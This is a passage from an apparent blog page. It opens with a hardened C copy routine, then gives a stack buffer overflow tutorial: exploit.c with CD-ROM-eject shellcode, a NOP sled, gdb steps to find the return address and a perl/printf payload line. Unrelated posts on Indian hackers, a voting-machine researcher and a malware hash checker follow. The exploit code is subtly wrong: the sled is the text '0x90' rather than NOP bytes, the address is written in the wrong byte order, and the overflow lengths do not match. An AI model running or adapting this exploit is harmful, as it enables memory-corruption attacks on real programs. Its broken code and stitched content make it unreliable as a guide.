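    const char *nul;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    /* Look for the terminator within the first dst_size bytes only. */
    nul = memchr(src, '\0', dst_size);
    if (nul == NULL) {          /* src needs more than dst_size bytes */
        dst[0] = '\0';          /* leave dst as a valid empty string */
        return -1;
    }
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* bof.c's main() with the unbounded strcpy() replaced.
 * Returns the exit status: 0 ok, 1 input too long, 2 missing argument. */
int bof_main(int argc, char *argv[])
{
    char str[STR_SIZE];

    if (argc < 2 || argv[1] == NULL) {   /* bof.c used argv[1] unchecked */
        fprintf(stderr, "usage: %s <string>\n", argc > 0 ? argv[0] : "bof");
        return 2;
    }
    if (safe_copy(str, sizeof str, argv[1]) != 0) {
        fprintf(stderr, "input longer than %d characters, rejected\n", STR_SIZE - 1);
        return 1;
    }
    printf("Done\n");
    return 0;
}

int main(int argc, char *argv[])
{
    return bof_main(argc, argv);
}
```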

Now we can start writing our exploit.
Our exploit is gonna contain the NOPSLED + shellcode + the address of the shellcode (the RET).
The NOPSLED is a chain of 0x90's (NOP = NO OPeration), placed before our shellcode.
The NOPSLED helps us so we don't have to jump exactly to the place in memory where our shellcode begins.

---------- exploit.c --------------
#include <stdio.h>
#include <string.h>

char exploit[2048];

int main(void)
{
int i;
/*
 * (linux/x86) eject cd-rom (follows "/dev/cdrom" symlink) + exit() - 40 bytes
 * - izik <[email protected]>
 */
char shellcode[] =    
    "\x6a\x05"              // push $0x5
    "\x58"                  // pop %eax
    "\x31\xc9"              // xor %ecx,%ecx
    "\x51"                  // push %ecx
    "\xb5\x08"              // mov $0x8,%ch
    "\x68\x64\x72\x6f\x6d"  // push $0x6d6f7264
    "\x68\x65\x76\x2f\x63"  // push $0x632f7665
    "\x68\x2f\x2f\x2f\x64"  // push $0x642f2f2f
    "\x89\xe3"              // mov %esp,%ebx
    "\xcd\x80"              // int $0x80
    "\x89\xc3"              // mov %eax,%ebx
    "\xb0\x36"              // mov $0x36,%al
    "\x66\xb9\x09\x53"      // mov $0x5309,%cx
    "\xcd\x80"              // int $0x80
    "\x40"                  // inc %eax
    "\xcd\x80";             // int $0x80

for(i = 0; i < 512; i++)
    strcat(exploit, "0x90");

strcat(exploit, shellcode);

printf("Loaded.\n");

return 0;
}
---------- exploit.c --------------

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.

Run our vuln program so we can find the RET, the address of our shellcode.
After we run it, we'll look at the ESP - the ESP points to the last element used on the stack.
Check this out:

niv@niv-desktop:~/Desktop$ gcc-3.3 exploit.c -o exploit
niv@niv-desktop:~/Desktop$ ./exploit
Loaded.
niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x60'`
Segmentation fault (core dumped)
niv@niv-desktop:~/Desktop$ gdb -c core ./bof
GNU gdb 6.6-debian
Copyright (C) 2006 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-linux-gnu"...
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
/home/niv/Desktop/core: No such file or directory.
(gdb) run `perl -e 'print "A"x60'`
Starting program: /home/niv/Desktop/bof `perl -e 'print "A"x60'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) x/s $esp

You're gonna get these things:

0xbf949694:      "`???}_???o??\002"
(gdb)
0xbf9496a2:      ""

etc.
Keep searching until you see something like this:

0xbf9496e0:"7?\224?J?\224?U?\224?i?\224?y?\224??\224?\002?\224?\024?\224?*?\224?3?\224???\224??\224?\v?\224?\030?\224?N?\224?Y?\224?q?\224???\224??\224???\224???\224?\025?\224?&?\224?;?\224?D?\224?W?\224?n?\224?v?\224?\205?\224???\224???\224?\024?\224?P?\224?p?\224?}?\224?\212?\224???\224??\224?"

0xbf9496e0 is the address of our shellcode (the RET).
To make our exploit work properly, we need to overwrite the EIP with the address of our shellcode. We'll take our old address (0xbf9496e0) and do this:

Take our address and split it into bytes: bf 94 96 e0
Grab the last byte (e0) and put \x in front of it -> \xe0
Do the same to each pair of characters, then order them so that the last byte of the address comes first in the new string (x86 stores addresses in little-endian byte order):

0xbf9496e0 -> \xe0\x96\x94\xbf

Now, we are gonna reach our shellcode this way:
Since we overflowed the program with 32 bytes (32 A's) and our RET is 4 bytes long, we subtract the length of the shellcode address (the RET) from the number of A's,
and we print 28 A's (32 A's - 4 bytes (RET's length) = 28) followed by the RET so we can reach the shellcode successfully.

niv@niv-desktop:~/Desktop$ ./bof `perl -e 'print "A"x28'``printf "\xbf\x94\x96\xe0"`

I suppose you already understood what's about to happen if you have read the exploit :)



Posted by XERO. ALL RIGHTS RESERVED.


Revolutionary Step Taken By Vaidehi Sachin: Uniting All the Indian Hackers


Vaidehi Sachin is a group editor of News Makers Broadcasting Communication and also the publisher of Afternoon Voice, a daily eveninger from Mumbai. Recently she has been writing a book on cyber terror and uniting all the Indian hackers to put them in the right direction under an organisation for the welfare of our country. Vaidehi is an award-winning writer and investigative journalist.

Sunday, September 5, 2010

Indian voting machine hacker released

AN INDIAN HACKER who managed to show how it was a doddle to steal an election using electronic voting machines has been released from the clutches of the local constabulary.

E-voting researcher Hari Prasad was released from jail after seven days in police custody.

According to Freedom to Tinker, Prasad was released following an order from Magistrate D H Sharma. Sharma praised Hari and made strong comments against the police. Prasad did a great service for his country, the magistrate said.

Prasad was arrested after he showed how to hack an electronic voting machine in front of a group of academics. The problem, according to the coppers who arrested him, was not that he had hacked the machine but rather where he got it in the first place.

The voting machines are supposed to be super secure, but as Prasad pointed out, they are anything but. If he could hack one so easily, then any corrupt politician with a bit of money could have the same thing done.

But Prasad's demonstration showed that the Election Commission's plans to roll out the machines were flawed.

It seems that soon after the demonstration, the embarrassed Commission made a complaint to the local plod. Since Prasad refused to say where he got the machine, which had been donated anonymously, they locked him up.

Simple Malware Scanner (Offline & Online)

Earlier I wrote about how to scan a file using multiple antiviruses online. Alternatively, you can take the md5 hash of the file and compare it against an offline database, or validate it against an online one like VirusTotal. This is done by a program called "Simple Malware Check Tool", developed by Mert Sarica. The program has HTTP proxy support and an update feature.



You can easily check the hash online by running -

python malware_check.py online malware.exe

This command calculates the md5 hash of the specified file (e.g. malware.exe), submits it to http://www.virustotal.com and then shows the result. To check offline, you need to run -

python malware_check.py offline malware.exe

This command takes the md5 hash of the specified file (e.g. malware.exe), searches for it in its current hash set (hashset.txt) and then shows the result.

python malware_check.py update

This command updates its current hash set (hashset.txt) by crawling threat information from http://www.avira.ro, including the virus name, virus type, md5 hash of the virus, severity and discovery date. If a hashset.txt already exists, it just brings the current hash set up to date.

To add proxy support, simply edit the .py script and add the relevant proxy details.

proxy_info = {
    'user' : 'username', # proxy username
    'pass' : 'password', # proxy password
    'host' : "proxy host", # proxy host
    'port' : 8080 # proxy port
    }

You can download the Malware Check Tool here:

Download Malware Check Tool



Posted by XERO. ALL RIGHTS RESERVED.
